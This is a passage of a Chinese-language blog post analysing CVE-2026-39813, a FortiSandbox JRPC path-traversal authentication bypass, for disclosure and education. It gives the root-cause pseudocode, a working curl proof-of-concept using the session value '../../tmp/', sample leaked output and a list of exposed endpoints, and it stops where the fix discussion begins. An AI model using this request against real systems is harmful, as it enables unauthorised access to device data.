<!doctype html>














<!-- `site.alt_lang` can specify a language different from the UI -->
<html lang="en" data-mode="dark">
  <head>
  <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
  <meta name="theme-color" media="(prefers-color-scheme: light)" content="#f7f7f7">
  <meta name="theme-color" media="(prefers-color-scheme: dark)" content="#1b1b1e">
  <meta name="mobile-web-app-capable" content="yes">
  <meta name="apple-mobile-web-app-status-bar-style" content="black-translucent">
  <meta
    name="viewport"
    content="width=device-width, user-scalable=no initial-scale=1, shrink-to-fit=no, viewport-fit=cover"
  ><!-- Setup Open Graph image -->

  

  <!-- Begin Jekyll SEO tag v2.8.0 -->
<meta name="generator" content="Jekyll v4.3.4" />
<meta property="og:title" content="CVE-2026-39813 深度分析：FortiSandbox JRPC API 路径遍历认证绕过" />
<meta name="author" content="imjdl" />
<meta property="og:locale" content="en" />
<meta name="description" content="一个精心构造的 ../../tmp/ 如何绕过认证体系，读取 FortiSandbox 全部系统信息" />
<meta property="og:description" content="一个精心构造的 ../../tmp/ 如何绕过认证体系，读取 FortiSandbox 全部系统信息" />
<link rel="canonical" href="/posts/blog_cve_2026_39813_cn/" />
<meta property="og:url" content="/posts/blog_cve_2026_39813_cn/" />
<meta property="og:site_name" content="imjdl blog" />
<meta property="og:image" content="/assets/img/20260421/logo.png" />
<meta property="og:type" content="article" />
<meta property="article:published_time" content="2026-04-21T12:33:00+08:00" />
<meta name="twitter:card" content="summary_large_image" />
<meta property="twitter:image" content="/assets/img/20260421/logo.png" />
<meta property="twitter:title" content="CVE-2026-39813 深度分析：FortiSandbox JRPC API 路径遍历认证绕过" />
<meta name="twitter:site" content="@Mortyjin" />
<meta name="twitter:creator" content="@MortyJin" />
<script type="application/ld+json">
{"@context":"https://schema.org","@type":"BlogPosting","author":{"@type":"Person","name":"imjdl","url":"https://github.com/imjdl/"},"dateModified":"2026-04-21T12:33:00+08:00","datePublished":"2026-04-21T12:33:00+08:00","description":"一个精心构造的 ../../tmp/ 如何绕过认证体系，读取 FortiSandbox 全部系统信息","headline":"CVE-2026-39813 深度分析：FortiSandbox JRPC API 路径遍历认证绕过","image":"/assets/img/20260421/logo.png","mainEntityOfPage":{"@type":"WebPage","@id":"/posts/blog_cve_2026_39813_cn/"},"url":"/posts/blog_cve_2026_39813_cn/"}</script>
<!-- End Jekyll SEO tag -->


  <title>CVE-2026-39813 深度分析：FortiSandbox JRPC API 路径遍历认证绕过 | imjdl blog
  </title>

  <!--
  The Favicons for Web, Android, Microsoft, and iOS (iPhone and iPad) Apps
  Generated by: https://realfavicongenerator.net/
-->



<link rel="apple-touch-icon" sizes="180x180" href="/assets/img/favicons/apple-touch-icon.png">
<link rel="icon" type="image/png" sizes="32x32" href="/assets/img/favicons/favicon-32x32.png">
<link rel="icon" type="image/png" sizes="16x16" href="/assets/img/favicons/favicon-16x16.png">

  <link rel="manifest" href="/assets/img/favicons/site.webmanifest">

<link rel="shortcut icon" href="/assets/img/favicons/favicon.ico">
<meta name="apple-mobile-web-app-title" content="imjdl blog">
<meta name="application-name" content="imjdl blog">
<meta name="msapplication-TileColor" content="#da532c">
<meta name="msapplication-config" content="/assets/img/favicons/browserconfig.xml">
<meta name="theme-color" content="#ffffff">


  <!-- Resource Hints -->
  
    
      
        <link rel="preconnect" href="https://fonts.googleapis.com" >
      
        <link rel="dns-prefetch" href="https://fonts.googleapis.com" >
      
    
      
        <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
      
        <link rel="dns-prefetch" href="https://fonts.gstatic.com" >
      
    
      
        <link rel="preconnect" href="https://cdn.jsdelivr.net" >
      
        <link rel="dns-prefetch" href="https://cdn.jsdelivr.net" >
      
    
  

  <!-- Bootstrap -->
  
    <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@5.3.3/dist/css/bootstrap.min.css">
  

  <!-- Theme style -->
  <link rel="stylesheet" href="/assets/css/jekyll-theme-chirpy.css">

  <!-- Web Font -->
  <link rel="stylesheet" href="https://fonts.googleapis.com/css2?family=Lato:wght@300;400&family=Source+Sans+Pro:wght@400;600;700;900&display=swap">

  <!-- Font Awesome Icons -->
  <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free@6.7.1/css/all.min.css">

  <!-- 3rd-party Dependencies -->

  
    <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/tocbot@4.32.2/dist/tocbot.min.css">
  

  
    <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/loading-attribute-polyfill@2.1.1/dist/loading-attribute-polyfill.min.css">
  

  
    <!-- Image Popup -->
    <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/glightbox@3.3.0/dist/css/glightbox.min.css">
  

  <!-- Scripts -->

  <script src="/assets/js/dist/theme.min.js"></script>

  <!-- JS selector for site. -->

<!-- commons -->



<!-- layout specified -->


  

  
    <!-- image lazy-loading & popup & clipboard -->
    
  















  
    

    

  

  
    

    

  

  
    

    

  

  
    

    

  

  
    

    

  

  
    

    

  

  
    

    

  

  
    

    

  

  
    

    

  

  
    

    

  



  <script defer src="https://cdn.jsdelivr.net/combine/npm/simple-jekyll-search@1.10.0/dest/simple-jekyll-search.min.js,npm/loading-attribute-polyfill@2.1.1/dist/loading-attribute-polyfill.umd.min.js,npm/glightbox@3.3.0/dist/js/glightbox.min.js,npm/clipboard@2.0.11/dist/clipboard.min.js,npm/dayjs@1.11.13/dayjs.min.js,npm/dayjs@1.11.13/locale/en.js,npm/dayjs@1.11.13/plugin/relativeTime.js,npm/dayjs@1.11.13/plugin/localizedFormat.js,npm/tocbot@4.32.2/dist/tocbot.min.js,npm/mermaid@11.4.0/dist/mermaid.min.js"></script>







<script defer src="/assets/js/dist/post.min.js"></script>


  <!-- MathJax -->
  <script async src="/assets/js/data/mathjax.js"></script>
  <script async src="https://cdnjs.cloudflare.com/polyfill/v3/polyfill.min.js?features=es6"></script>
  <script id="MathJax-script" async src="https://cdn.jsdelivr.net/npm/mathjax@3.2.2/es5/tex-chtml.js"></script>


<!-- Pageviews -->

  

  



  

  <!-- A placeholder to allow defining custom metadata -->

</head>


  <body>
    <!-- The Side Bar -->

<aside aria-label="Sidebar" id="sidebar" class="d-flex flex-column align-items-end">
  <header class="profile-wrapper">
    <a href="/" id="avatar" class="rounded-circle"><img src="/assets/img/favicons/log.png" width="112" height="112" alt="avatar" onerror="this.style.display='none'"></a>

    <a class="site-title d-block" href="/">imjdl blog</a>
    <p class="site-subtitle fst-italic mb-0">Perpetual student, continual incremental improvement.</p>
  </header>
  <!-- .profile-wrapper -->

  <nav class="flex-column flex-grow-1 w-100 ps-0">
    <ul class="nav">
      <!-- home -->
      <li class="nav-item">
        <a href="/" class="nav-link">
          <i class="fa-fw fas fa-home"></i>
          <span>HOME</span>
        </a>
      </li>
      <!-- the real tabs -->
      
        <li class="nav-item">
          <a href="/categories/" class="nav-link">
            <i class="fa-fw fas fa-stream"></i>
            

            <span>CATEGORIES</span>
          </a>
        </li>
        <!-- .nav-item -->
      
        <li class="nav-item">
          <a href="/tags/" class="nav-link">
            <i class="fa-fw fas fa-tags"></i>
            

            <span>TAGS</span>
          </a>
        </li>
        <!-- .nav-item -->
      
        <li class="nav-item">
          <a href="/archives/" class="nav-link">
            <i class="fa-fw fas fa-archive"></i>
            

            <span>ARCHIVES</span>
          </a>
        </li>
        <!-- .nav-item -->
      
        <li class="nav-item">
          <a href="/about/" class="nav-link">
            <i class="fa-fw fas fa-info-circle"></i>
            

            <span>ABOUT</span>
          </a>
        </li>
        <!-- .nav-item -->
      
        <li class="nav-item">
          <a href="/reading-list/" class="nav-link">
            <i class="fa-fw fa fa-list-alt"></i>
            

            <span>READING LIST</span>
          </a>
        </li>
        <!-- .nav-item -->
      
    </ul>
  </nav>

  <div class="sidebar-bottom d-flex flex-wrap  align-items-center w-100">
    

    
      

      
        <a
          href="https://github.com/imjdl"
          aria-label="github"
          

          
            target="_blank"
            
          

          

          
            rel="noopener noreferrer"
          
        >
          <i class="fab fa-github"></i>
        </a>
      
    
      

      
        <a
          href="https://twitter.com/Mortyjin"
          aria-label="twitter"
          

          
            target="_blank"
            
          

          

          
            rel="noopener noreferrer"
          
        >
          <i class="fa-brands fa-x-twitter"></i>
        </a>
      
    
      

      
        <a
          href="javascript:location.href = 'mailto:' + ['imelloit','gmail.com'].join('@')"
          aria-label="email"
          

          

          

          
        >
          <i class="fas fa-envelope"></i>
        </a>
      
    
      

      
        <a
          href="/feed.xml"
          aria-label="rss"
          

          

          

          
        >
          <i class="fas fa-rss"></i>
        </a>
      
    
  </div>
  <!-- .sidebar-bottom -->
</aside>
<!-- #sidebar -->


    <div id="main-wrapper" class="d-flex justify-content-center">
      <div class="container d-flex flex-column px-xxl-5">
        <!-- The Top Bar -->

<header id="topbar-wrapper" aria-label="Top Bar">
  <div
    id="topbar"
    class="d-flex align-items-center justify-content-between px-lg-3 h-100"
  >
    <nav id="breadcrumb" aria-label="Breadcrumb">
      

      
        
          
            <span>
              <a href="/">Home</a>
            </span>

          
        
          
        
          
            
              <span>CVE-2026-39813 深度分析：FortiSandbox JRPC API 路径遍历认证绕过</span>
            

          
        
      
    </nav>
    <!-- endof #breadcrumb -->

    <button type="button" id="sidebar-trigger" class="btn btn-link">
      <i class="fas fa-bars fa-fw"></i>
    </button>

    <div id="topbar-title">
      Post
    </div>

    <button type="button" id="search-trigger" class="btn btn-link">
      <i class="fas fa-search fa-fw"></i>
    </button>

    <search id="search" class="align-items-center ms-3 ms-lg-0">
      <i class="fas fa-search fa-fw"></i>
      <input
        class="form-control"
        id="search-input"
        type="search"
        aria-label="search"
        autocomplete="off"
        placeholder="Search..."
      >
    </search>
    <button type="button" class="btn btn-link text-decoration-none" id="search-cancel">Cancel</button>
  </div>
</header>


        <div class="row flex-grow-1">
          <main aria-label="Main Content" class="col-12 col-lg-11 col-xl-9 px-md-4">
            
              <!-- Refactor the HTML structure -->



<!--
  In order to allow a wide table to scroll horizontally,
  we suround the markdown table with `<div class="table-wrapper">` and `</div>`
-->



<!--
  Fixed kramdown code highlight rendering:
  https://github.com/penibelst/jekyll-compress-html/issues/101
  https://github.com/penibelst/jekyll-compress-html/issues/71#issuecomment-188144901
-->



<!-- Change the icon of checkbox -->



<!-- Handle images -->




  
  

  
    
      
      
    

    
    

    

    
    

    
    
    

    
      

      
      
      

      
    
      

      
      
      

      
    
      

      
      
      

      
    
      

      
      
      

      
    
      

      
      
      

      
    

    <!-- take out classes -->
    

    
    

    

    
      
    

    <!-- lazy-load images -->
    

    
      <!-- make sure the `<img>` is wrapped by `<a>` -->
      

      
        <!-- create the image wrapper -->
        

        
        
      
    

    <!-- combine -->
    
  

  


<!-- Add header for code snippets -->



<!-- Create heading anchors -->





  
  

  
    
    

    
      
        
        
      

      
      

      
      
      

      
    
      

      
      

      
      
      

      
    
      

      
      

      
      
      

      
    
      

      
      

      
      
      

      
    
      

      
      

      
      
      

      
    
      

      
      

      
      
      

      
    
      

      
      

      
      
      

      
    
      

      
      

      
      
      

      
    
      

      
      

      
      
      

      
    
      

      
      

      
      
      

      
    
      

      
      

      
      
      

      
    
      

      
      

      
      
      

      
    
      

      
      

      
      
      

      
    
      

      
      

      
      
      

      
    

    
  

  
  

  
    
    

    
      
        
        
      

      
      

      
      
      

      
    
      

      
      

      
      
      

      
    
      

      
      

      
      
      

      
    

    
  

  
  

  

  
  

  




<!-- return -->










<article class="px-1" data-toc="true">
  <header>
    <h1 data-toc-skip>CVE-2026-39813 深度分析：FortiSandbox JRPC API 路径遍历认证绕过</h1>
    

    <div class="post-meta text-muted">
      <!-- published date -->
      <span>
        Posted
        <!--
  Date format snippet
  See: ${JS_ROOT}/utils/locale-dateime.js
-->




<time
  
  data-ts="1776745980"
  data-df="ll"
  
    data-bs-toggle="tooltip" data-bs-placement="bottom"
  
>
  Apr 21, 2026
</time>

      </span>

      <!-- lastmod date -->
      

      
        
        
        

        

        <div class="mt-3 mb-3">
          <a href="/assets/img/20260421/logo.png" class="popup img-link preview-img shimmer"><img src="/assets/img/20260421/logo.png"  alt="Preview Image" width="1200" height="630"  loading="lazy"></a></div>
      

      <div class="d-flex justify-content-between">
        <!-- author(s) -->
        <span>
          

          By

          <em>
            
              
                <a href="https://github.com/imjdl/">imjdl</a>
                
              
            
          </em>
        </span>

        <div>
          <!-- pageviews -->
          

          <!-- read time -->
          <!-- Calculate the post's reading time, and display the word count in tooltip -->



<!-- words per minute -->










<!-- return element -->
<span
  class="readtime"
  data-bs-toggle="tooltip"
  data-bs-placement="bottom"
  title="1945 words"
>
  <em>10 min</em> read</span>

        </div>
      </div>
    </div>
  </header>

  
    <div id="toc-bar" class="d-flex align-items-center justify-content-between invisible">
      <span class="label text-truncate">CVE-2026-39813 深度分析：FortiSandbox JRPC API 路径遍历认证绕过</span>
      <button type="button" class="toc-trigger btn me-1">
        <i class="fa-solid fa-list-ul fa-fw"></i>
      </button>
    </div>

    <button id="toc-solo-trigger" type="button" class="toc-trigger btn btn-outline-secondary btn-sm">
      <span class="label ps-2 pe-1">Contents</span>
      <i class="fa-solid fa-angle-right fa-fw"></i>
    </button>

    <dialog id="toc-popup" class="p-0">
      <div class="header d-flex flex-row align-items-center justify-content-between">
        <div class="label text-truncate py-2 ms-4">CVE-2026-39813 深度分析：FortiSandbox JRPC API 路径遍历认证绕过</div>
        <button id="toc-popup-close" type="button" class="btn mx-1 my-1 opacity-75">
          <i class="fas fa-close"></i>
        </button>
      </div>
      <div id="toc-popup-content" class="px-4 py-3 pb-4"></div>
    </dialog>
  

  <div class="content">
    <blockquote>
  <p>一个精心构造的 <code class="language-plaintext highlighter-rouge">../../tmp/</code> 如何绕过认证体系，读取 FortiSandbox 全部系统信息</p>
</blockquote>

<h2 id="背景"><span class="me-2">背景</span><a href="#背景" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2>

<p>2026 年 4 月 14 日，Fortinet 发布了 FG-IR-26-112 安全公告，披露了 FortiSandbox 产品中一个严重的路径遍历漏洞 <strong>CVE-2026-39813</strong>（CVSS 9.1）。该漏洞影响 FortiSandbox 4.4.0–4.4.8 和 5.0.0–5.0.5 版本，已在 4.4.9 和 5.0.6 中修复。</p>

<p>本文基于固件逆向分析，从字节码层面还原漏洞的完整利用链。</p>

<h2 id="摘要"><span class="me-2">摘要</span><a href="#摘要" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2>

<ul>
  <li><strong>漏洞类型：</strong> JRPC API 的 <code class="language-plaintext highlighter-rouge">is_valid_session()</code> 函数将用户输入的 <code class="language-plaintext highlighter-rouge">session</code> 字段直接拼入文件路径 <code class="language-plaintext highlighter-rouge">os.path.join(DIRRPCSESS, session_id)</code>，未进行输入验证</li>
  <li><strong>利用条件：</strong> 构造 <code class="language-plaintext highlighter-rouge">session: "../../tmp/"</code> 即可绕过认证——<code class="language-plaintext highlighter-rouge">/tmp/</code> 目录始终存在且 mtime 持续刷新</li>
  <li><strong>影响范围：</strong> 未授权读取系统版本、主机名、序列号、CPU/内存/磁盘使用率、扫描配置等；可下载 32KB 加密系统备份</li>
  <li><strong>前置条件：</strong> 无需任何凭据，单条 HTTP 请求即可触发</li>
</ul>

<h2 id="认证架构分析"><span class="me-2">认证架构分析</span><a href="#认证架构分析" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2>

<p>FortiSandbox 的 Web 管理界面基于 Django，使用两层认证架构保护 API：</p>

<div class="language-plaintext highlighter-rouge"><div class="code-header">
        <span data-label-text="Plaintext"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
</pre></td><td class="rouge-code"><pre>HTTP 请求
  │
  ├── 第一层：Django 中间件 FSAuthenticationMiddleware
  │     ├── /jsonrpc 在 AUTH_PATH_EXCEPTIONS 白名单中 → 直接放行
  │     └── 其他路径 → authenticate() 检查 session cookie
  │
  └── 第二层：JRPC 自带认证
        └── is_valid_session() 检查 session_id 是否有效
</pre></td></tr></tbody></table></code></div></div>

<p><strong>第一层：</strong> <code class="language-plaintext highlighter-rouge">/jsonrpc</code> 被列入中间件白名单，Django 层不对其进行认证检查。这是设计意图——JRPC 有独立的 session 认证体系。</p>

<p><strong>第二层：</strong> 该独立认证体系存在路径遍历漏洞。</p>

<h2 id="漏洞根因分析"><span class="me-2">漏洞根因分析</span><a href="#漏洞根因分析" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2>

<p>漏洞位于 <code class="language-plaintext highlighter-rouge">apps/jsonrpc/rpcsession.pyc</code> 中的 <code class="language-plaintext highlighter-rouge">is_valid_session()</code> 函数：</p>

<div class="language-python highlighter-rouge"><div class="code-header">
        <span data-label-text="Python"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
</pre></td><td class="rouge-code"><pre><span class="c1"># 字节码还原的伪代码 (CPython 3.10)
</span><span class="k">def</span> <span class="nf">is_valid_session</span><span class="p">(</span><span class="n">session_id</span><span class="p">,</span> <span class="n">remote_ip</span><span class="p">):</span>
    <span class="n">fpath</span> <span class="o">=</span> <span class="n">os</span><span class="p">.</span><span class="n">path</span><span class="p">.</span><span class="nf">join</span><span class="p">(</span><span class="n">DIRRPCSESS</span><span class="p">,</span> <span class="n">session_id</span><span class="p">)</span>  <span class="c1"># DIRRPCSESS = "/usr/rpcsess/"
</span>
    <span class="k">if</span> <span class="ow">not</span> <span class="n">os</span><span class="p">.</span><span class="n">path</span><span class="p">.</span><span class="nf">exists</span><span class="p">(</span><span class="n">fpath</span><span class="p">):</span>
        <span class="k">return</span> <span class="bp">False</span>

    <span class="n">mtime</span> <span class="o">=</span> <span class="n">os</span><span class="p">.</span><span class="n">path</span><span class="p">.</span><span class="nf">getmtime</span><span class="p">(</span><span class="n">fpath</span><span class="p">)</span>
    <span class="k">if</span> <span class="n">time</span><span class="p">.</span><span class="nf">time</span><span class="p">()</span> <span class="o">-</span> <span class="n">mtime</span> <span class="o">&gt;</span> <span class="n">RPC_SESSION_TIMEOUT</span><span class="p">:</span>  <span class="c1"># 3600 秒
</span>        <span class="k">return</span> <span class="bp">False</span>

    <span class="nf">renew_session</span><span class="p">(</span><span class="n">fpath</span><span class="p">)</span>  <span class="c1"># os.path.utime(fpath, None) — 刷新 mtime
</span>    <span class="k">return</span> <span class="bp">True</span>
</pre></td></tr></tbody></table></code></div></div>

<p><code class="language-plaintext highlighter-rouge">session_id</code> 来自 HTTP 请求的 JSON body，属于用户可控输入，但函数在传入 <code class="language-plaintext highlighter-rouge">os.path.join()</code> 之前未进行任何过滤或格式校验：</p>

<div class="table-wrapper"><table>
  <thead>
    <tr>
      <th>输入</th>
      <th>解析路径</th>
      <th>效果</th>
    </tr>
  </thead>
  <tbody>
    <tr>
      <td><code class="language-plaintext highlighter-rouge">"abc123def456abc123def456abc123de"</code> (合法 session)</td>
      <td><code class="language-plaintext highlighter-rouge">/usr/rpcsess/abc123def456abc123def456abc123de</code></td>
      <td>正常认证</td>
    </tr>
    <tr>
      <td><code class="language-plaintext highlighter-rouge">"../../tmp/"</code> (攻击)</td>
      <td><code class="language-plaintext highlighter-rouge">/usr/rpcsess/../../tmp/</code> = <code class="language-plaintext highlighter-rouge">/tmp/</code></td>
      <td><strong>绕过认证</strong></td>
    </tr>
    <tr>
      <td><code class="language-plaintext highlighter-rouge">"../../etc/hostname"</code> (攻击)</td>
      <td><code class="language-plaintext highlighter-rouge">/usr/rpcsess/../../etc/hostname</code> = <code class="language-plaintext highlighter-rouge">/etc/hostname</code></td>
      <td><strong>绕过认证</strong></td>
    </tr>
  </tbody>
</table></div>

<p><code class="language-plaintext highlighter-rouge">os.path.join()</code> 会保留前导的 <code class="language-plaintext highlighter-rouge">..</code>，Python 标准库不会自动净化路径。只要目标路径满足两个条件就通过验证：</p>
<ol>
  <li>文件/目录<strong>存在</strong></li>
  <li>mtime 在 <strong>3600 秒以内</strong></li>
</ol>

<h2 id="为什么-tmp-是最佳选择"><span class="me-2">为什么 <code class="language-plaintext highlighter-rouge">/tmp/</code> 是最佳选择</span><a href="#为什么-tmp-是最佳选择" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2>

<p>攻击者需要构造一个始终存在且 mtime 持续刷新的路径。<code class="language-plaintext highlighter-rouge">/tmp/</code> 是可靠的选择：</p>

<ul>
  <li>所有运行中的 FortiSandbox 实例均存在 <code class="language-plaintext highlighter-rouge">/tmp/</code> 目录</li>
  <li>系统的 cron 任务、日志轮转、Redis 缓存等会持续写入该目录</li>
  <li><code class="language-plaintext highlighter-rouge">renew_session()</code> 在验证通过后调用 <code class="language-plaintext highlighter-rouge">os.path.utime(fpath, None)</code> 刷新 mtime，使得只要每小时至少请求一次，session 即不会过期</li>
</ul>

<h2 id="攻击演示"><span class="me-2">攻击演示</span><a href="#攻击演示" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2>

<h3 id="1-未授权获取系统信息"><span class="me-2">1. 未授权获取系统信息</span><a href="#1-未授权获取系统信息" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h3>

<div class="language-bash highlighter-rouge"><div class="code-header">
        <span data-label-text="Shell"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
</pre></td><td class="rouge-code"><pre>curl <span class="nt">-k</span> <span class="nt">-X</span> POST <span class="s2">"https://TARGET/fortisandbox/jsonrpc/"</span> <span class="se">\</span>
  <span class="nt">-H</span> <span class="s2">"Content-Type: application/json"</span> <span class="se">\</span>
  <span class="nt">-d</span> <span class="s1">'{
    "id": 1,
    "session": "../../tmp/",
    "method": "get",
    "params": [{"url": "sys/status"}],
    "ver": "2.0"
  }'</span>
</pre></td></tr></tbody></table></code></div></div>

<p>响应中包含 26 个字段的系统信息：</p>

<div class="language-json highlighter-rouge"><div class="code-header">
        <span data-label-text="JSON"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
</pre></td><td class="rouge-code"><pre><span class="p">{</span><span class="w">
  </span><span class="nl">"result"</span><span class="p">:</span><span class="w"> </span><span class="p">{</span><span class="w">
    </span><span class="nl">"status"</span><span class="p">:</span><span class="w"> </span><span class="p">{</span><span class="nl">"code"</span><span class="p">:</span><span class="w"> </span><span class="mi">0</span><span class="p">,</span><span class="w"> </span><span class="nl">"message"</span><span class="p">:</span><span class="w"> </span><span class="s2">"OK"</span><span class="p">},</span><span class="w">
    </span><span class="nl">"data"</span><span class="p">:</span><span class="w"> </span><span class="p">{</span><span class="w">
      </span><span class="nl">"Version"</span><span class="p">:</span><span class="w"> </span><span class="s2">"FortiSandbox-VM v4.48,build0412,251007 (GA)"</span><span class="p">,</span><span class="w">
      </span><span class="nl">"Serial-Number"</span><span class="p">:</span><span class="w"> </span><span class="s2">"FSA-VM0000000000"</span><span class="p">,</span><span class="w">
      </span><span class="nl">"Hostname"</span><span class="p">:</span><span class="w"> </span><span class="s2">"FSA-VM0000000000"</span><span class="p">,</span><span class="w">
      </span><span class="nl">"System-Time"</span><span class="p">:</span><span class="w"> </span><span class="s2">"2026-04-21 10:30:00"</span><span class="p">,</span><span class="w">
      </span><span class="nl">"Disk-Usage"</span><span class="p">:</span><span class="w"> </span><span class="s2">"2.05%"</span><span class="p">,</span><span class="w">
      </span><span class="err">...</span><span class="w">
    </span><span class="p">}</span><span class="w">
  </span><span class="p">}</span><span class="w">
</span><span class="p">}</span><span class="w">
</span></pre></td></tr></tbody></table></code></div></div>

<h3 id="2-批量探测-50-个-jrpc-端点"><span class="me-2">2. 批量探测 50+ 个 JRPC 端点</span><a href="#2-批量探测-50-个-jrpc-端点" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h3>

<p>经过对固件的完整审计，JRPC API 暴露了以下端点：</p>

<div class="table-wrapper"><table>
  <thead>
    <tr>
      <th>类别</th>
      <th>端点</th>
      <th>未授权可读</th>
    </tr>
  </thead>
  <tbody>
    <tr>
      <td>系统信息</td>
      <td><code class="language-plaintext highlighter-rouge">sys/status</code>, <code class="language-plaintext highlighter-rouge">sys/system_resource</code></td>
      <td>可读</td>
    </tr>
    <tr>
      <td>扫描配置</td>
      <td><code class="language-plaintext highlighter-rouge">config/scan/options</code>, <code class="language-plaintext highlighter-rouge">config/scan/file_exts</code></td>
      <td>可读</td>
    </tr>
    <tr>
      <td>系统备份</td>
      <td><code class="language-plaintext highlighter-rouge">backup/config</code></td>
      <td>可读 (32KB 加密)</td>
    </tr>
    <tr>
      <td>网络配置</td>
      <td><code class="language-plaintext highlighter-rouge">config/system/interface</code>, <code class="language-plaintext highlighter-rouge">config/system/dns</code></td>
      <td>需权限</td>
    </tr>
    <tr>
      <td>管理员管理</td>
      <td><code class="language-plaintext highlighter-rouge">config/system/administrator</code></td>
      <td>需权限</td>
    </tr>
  </tbody>
</table></div>

<p>只读端点（无 <code class="language-plaintext highlighter-rouge">has_admin_write_permission</code> 检查的）可完全绕过认证获取数据。</p>

<h3 id="3-下载加密系统备份"><span class="me-2">3. 下载加密系统备份</span><a href="#3-下载加密系统备份" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h3>

<div class="language-plaintext highlighter-rouge"><div class="code-header">
        <span data-label-text="Plaintext"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre></td><td class="rouge-code"><pre>backup/config → 返回 32KB OpenSSL 加密数据（Salted__ 前缀）
</pre></td></tr></tbody></table></code></div></div>

<p>加密密钥存储在 <code class="language-plaintext highlighter-rouge">/etc/secret_key</code>。如果能同时读取该文件，即可解密完整系统配置。</p>

<h2 id="process-双路径设计问题"><span class="me-2">process() 双路径设计问题</span><a href="#process-双路径设计问题" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2>

<p>在审计过程中还发现 <code class="language-plaintext highlighter-rouge">rpc.pyc</code> 的 <code class="language-plaintext highlighter-rouge">process()</code> 函数存在两条请求处理路径：</p>

<div class="language-plaintext highlighter-rouge"><div class="code-header">
        <span data-label-text="Plaintext"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
</pre></td><td class="rouge-code"><pre>路径 A（form-urlencoded POST）:
  data = json.loads(request.POST['data'])
  is_valid_session(data['session'], remote_ip)  ← 有 session 检查
  ↓ True → 继续处理

路径 B（JSON body / 回退）:
  json.loads(request.body)  ← 直接解析
  → URL 路由分发  ← 完全不检查 session!
</pre></td></tr></tbody></table></code></div></div>

<p>路径 B（Content-Type: application/json）完全跳过了 <code class="language-plaintext highlighter-rouge">is_valid_session()</code> 调用。这意味着 JSON 格式的请求不仅不受中间件限制，连 RPC 层的 session 检查也被绕过了。安全完全依赖各 handler 内部的权限检查。</p>

<h2 id="权限模型分析"><span class="me-2">权限模型分析</span><a href="#权限模型分析" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2>

<p>部分高危操作（修改密码、修改网络配置）有额外保护：</p>

<div class="language-python highlighter-rouge"><div class="code-header">
        <span data-label-text="Python"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
</pre></td><td class="rouge-code"><pre><span class="k">def</span> <span class="nf">has_admin_write_permission</span><span class="p">(</span><span class="n">sess_id</span><span class="p">):</span>
    <span class="n">user</span> <span class="o">=</span> <span class="nf">get_username_by_sessionid</span><span class="p">(</span><span class="n">sess_id</span><span class="p">)</span>  <span class="c1"># 从 session 文件读取用户名
</span>    <span class="n">perm</span> <span class="o">=</span> <span class="nf">get_user_privileges</span><span class="p">(</span><span class="n">user</span><span class="p">)</span>             <span class="c1"># 查询数据库权限
</span></pre></td></tr></tbody></table></code></div></div>

<p>当 <code class="language-plaintext highlighter-rouge">session</code> 为 <code class="language-plaintext highlighter-rouge">../../tmp/</code> 时：</p>
<ul>
  <li><code class="language-plaintext highlighter-rouge">get_username_by_sessionid()</code> 尝试 <code class="language-plaintext highlighter-rouge">open("/tmp/", "r")</code> → 目录 → 抛出 <code class="language-plaintext highlighter-rouge">IsADirectoryError</code></li>
  <li>异常被捕获 → 返回 <code class="language-plaintext highlighter-rouge">INVALID_SESSION</code></li>
</ul>

<p>因此，需要管理员权限的写操作在路径遍历场景下被阻止。<strong>但只读端点的信息泄露已构成严重的安全风险。</strong></p>

<h2 id="修复方案分析"><span class="me-2">修复方案分析</span><a href="#修复方案分析" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2>

<p>Fortinet 在 4.4.9 中的修复非常简洁——在路径拼接之前添加正则白名单：</p>

<div class="language-python highlighter-rouge"><div class="code-header">
